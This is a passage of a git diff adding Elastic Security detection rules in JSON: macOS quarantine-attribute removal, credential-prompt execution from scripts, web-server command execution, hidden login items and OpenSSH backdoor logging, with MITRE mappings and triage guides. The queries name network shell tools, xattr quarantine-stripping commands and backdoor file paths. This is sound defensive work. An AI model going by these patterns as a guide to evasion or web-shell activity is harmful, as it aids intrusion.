"setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + }, + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/", + "subtechnique": [ + { + "id": "T1027.006", + "name": "HTML Smuggling", + "reference": "https://attack.mitre.org/techniques/T1027/006/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "f0493cb4-9b15-43a9-9359-68c23a7f2cf3_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_107.json b/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_107.json new file mode 100644 index 00000000000..bf782a9c5ae --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_107.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a potential Gatekeeper bypass. In macOS, when applications or programs are downloaded from the internet, there is a quarantine flag set on the file. This attribute is read by Apple's Gatekeeper defense program at execution time. An adversary may disable this attribute to evade defenses.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Attempt to Remove File Quarantine Attribute", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n process.name : \"xattr\" and\n (\n (process.args : \"com.apple.quarantine\" and process.args : (\"-d\", \"-w\")) or\n (process.args : \"-c\") or\n (process.command_line : (\"/bin/bash -c xattr -c *\", \"/bin/zsh -c xattr -c *\", \"/bin/sh -c xattr -c *\"))\n ) and not process.args_count > 12\n", + "references": [ + "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", + "https://ss64.com/osx/xattr.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "f0b48bbc-549e-4bcf-8ee0-a7a72586c6a7_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_106.json b/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_106.json new file mode 100644 index 00000000000..e03bac68f9e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_106.json @@ -0,0 +1,114 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution of the security_authtrampoline process via a scripting interpreter. This occurs when programs use AuthorizationExecute-WithPrivileges from the Security.framework to run another program with root privileges. It should not be run by itself, as this is a sign of execution with explicit logon credentials.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Execution with Explicit Credentials via Scripting", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.name:\"security_authtrampoline\" and\n process.parent.name:(osascript or com.apple.automator.runner or sh or bash or dash or zsh or python* or Python or perl* or php* or ruby or pwsh)\n", + "references": [ + "https://objectivebythesea.com/v2/talks/OBTS_v2_Thomas.pdf", + "https://www.manpagez.com/man/8/security_authtrampoline/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f0eb70e9-71e9-40cd-813f-bf8e8c812cb1", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/" + }, + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.004", + "name": "Elevated Execution with Prompt", + "reference": "https://attack.mitre.org/techniques/T1548/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "f0eb70e9-71e9-40cd-813f-bf8e8c812cb1_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_7.json b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_7.json new file mode 100644 index 00000000000..97e224e2743 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_7.json @@ -0,0 +1,122 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious commands executed via a web server, which may suggest a vulnerability and remote shell access. Attackers may exploit a vulnerability in a web application to execute commands via a web server, or place a backdoor file that can be abused to gain code execution as a mechanism for persistence.", + "false_positives": [ + "Network monitoring or management products may have a web server component that runs shell commands as part of normal behavior." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Remote Code Execution via Web Server", + "note": "## Triage and analysis\n\n### Investigating Potential Remote Code Execution via Web Server\n\nAdversaries may backdoor web servers with web shells to establish persistent access to systems. A web shell is a malicious script, often embedded into a compromised web server, that grants an attacker remote access and control over the server. This enables the execution of arbitrary commands, data exfiltration, and further exploitation of the target network.\n\nThis rule detects a web server process spawning script and command line interface programs, potentially indicating attackers executing commands using the web shell.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate abnormal behaviors by the subject process such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential reverse shells or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Investigate the process information for malicious or uncommon processes/process trees.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n - Investigate the process tree spawned from the user that is used to run the web application service. A user that is running a web application should not spawn other child processes.\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info for Webapp User\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes WHERE uid = {{process.user.id}}\"}}\n- Examine the command line to determine which commands or scripts were executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\nevent.action in (\"exec\", \"exec_event\") and process.parent.executable : (\n \"/usr/sbin/nginx\", \"/usr/local/sbin/nginx\",\n \"/usr/sbin/apache\", \"/usr/local/sbin/apache\",\n \"/usr/sbin/apache2\", \"/usr/local/sbin/apache2\",\n \"/usr/sbin/php*\", \"/usr/local/sbin/php*\",\n \"/usr/sbin/lighttpd\", \"/usr/local/sbin/lighttpd\",\n \"/usr/sbin/hiawatha\", \"/usr/local/sbin/hiawatha\",\n \"/usr/local/bin/caddy\", \n \"/usr/local/lsws/bin/lswsctrl\",\n \"*/bin/catalina.sh\"\n) and\nprocess.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\",\n \"netcat\", \"ncat\", \"telnet\", \"awk\", \"socat\"\n ) and process.args : (\n \"whoami\", \"id\", \"uname\", \"cat\", \"hostname\", \"ip\", \"curl\", \"wget\", \"pwd\", \"ls\", \"cd\", \"python*\", \"php*\", \"perl\",\n \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"socat\"\n ) and not process.name == \"phpquery\"\n", + "references": [ + "https://pentestlab.blog/tag/web-shell/", + "https://www.elastic.co/security-labs/elastic-response-to-the-the-spring4shell-vulnerability-cve-2022-22965" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f16fca20-4d6c-43f9-aec1-20b6de3b0aeb", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Initial Access", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/", + "subtechnique": [ + { + "id": "T1505.003", + "name": "Web Shell", + "reference": "https://attack.mitre.org/techniques/T1505/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1190", + "name": "Exploit Public-Facing Application", + "reference": "https://attack.mitre.org/techniques/T1190/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "f16fca20-4d6c-43f9-aec1-20b6de3b0aeb_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_108.json b/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_108.json new file mode 100644 index 00000000000..0965938c463 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_108.json @@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of osascript to create a hidden login item. This may indicate an attempt to persist a malicious program while concealing its presence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Creation of Hidden Login Item via Apple Script", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and process.name : \"osascript\" and\n process.command_line : \"osascript*login item*hidden:true*\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f24bcae1-8980-4b30-b5dd-f851b055c9e7", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.002", + "name": "AppleScript", + "reference": "https://attack.mitre.org/techniques/T1059/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1647", + "name": "Plist File Modification", + "reference": "https://attack.mitre.org/techniques/T1647/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "f24bcae1-8980-4b30-b5dd-f851b055c9e7_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_109.json b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_109.json new file mode 100644 index 00000000000..deb702bb3f8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_109.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a Secure Shell (SSH) client or server process creating or writing to a known SSH backdoor log file. Adversaries may modify SSH related binaries for persistence or credential access via patching sensitive functions to enable unauthorized access or to log SSH credentials for exfiltration.", + "false_positives": [ + "Updates to approved and trusted SSH executables can trigger this rule." + ], + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential OpenSSH Backdoor Logging Activity", + "query": "file where host.os.type == \"linux\" and event.type == \"change\" and process.executable : (\"/usr/sbin/sshd\", \"/usr/bin/ssh\") and\n (\n (file.name : (\".*\", \"~*\", \"*~\") and not file.name : (\".cache\", \".viminfo\", \".bash_history\", \".google_authenticator\",\n \".jelenv\", \".csvignore\", \".rtreport\")) or\n file.extension : (\"in\", \"out\", \"ini\", \"h\", \"gz\", \"so\", \"sock\", \"sync\", \"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\") or\n file.path :\n (\n \"/private/etc/*--\",\n \"/usr/share/*\",\n \"/usr/include/*\",\n \"/usr/local/include/*\",\n \"/private/tmp/*\",\n \"/private/var/tmp/*\",\n \"/usr/tmp/*\",\n \"/usr/share/man/*\",\n \"/usr/local/share/*\",\n \"/usr/lib/*.so.*\",\n \"/private/etc/ssh/.sshd_auth\",\n \"/usr/bin/ssd\",\n \"/private/var/opt/power\",\n \"/private/etc/ssh/ssh_known_hosts\",\n \"/private/var/html/lol\",\n \"/private/var/log/utmp\",\n \"/private/var/lib\",\n \"/var/run/sshd/sshd.pid\",\n \"/var/run/nscd/ns.pid\",\n \"/var/run/udev/ud.pid\",\n \"/var/run/udevd.pid\"\n )\n )\n", + "references": [ + "https://github.com/eset/malware-ioc/tree/master/sshdoor", + "https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "f28e2be4-6eca-4349-bdd9-381573730c22", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": 